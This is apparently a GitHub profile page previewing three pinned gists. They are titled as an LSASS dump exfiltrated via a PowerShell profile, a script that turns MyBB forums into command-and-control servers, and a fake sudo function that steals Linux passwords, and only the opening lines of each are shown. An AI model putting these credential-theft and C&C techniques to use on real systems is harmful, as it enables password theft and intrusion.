💻
tokyoneon@kali ~#
PinnedLoading
- exfil LSASS dump via Microsoft.Power...
exfil LSASS dump via Microsoft.PowerShell_profile.ps1 1# write-up: https://www.varonis.com/blog/author/tokyoneon/
23# an if statement to prevent the attack from executing without administrator privileges
4if (whoami/groups| findstr/i"S-1-16-12288")
5{
- MyCC - turn MyBB forums into C&C ser...
MyCC - turn MyBB forums into C&C servers 1#!/bin/bash
23# https://null-byte.com/turn-forums-into-c-c-servers-0196708/
45whiletrue;do
- Sudo function for stealing Linux pas...
Sudo function for stealing Linux passwords 1function sudo ()
2{
3# https://null-byte.com/privesc-0194190/
4realsudo="$(which sudo)";
5read -s -p "[sudo] password for $USER: " inputPasswd;
Something went wrong, please refresh the page to try again.
If the problem persists, check theGitHub status page orcontact support.
If the problem persists, check theGitHub status page orcontact support.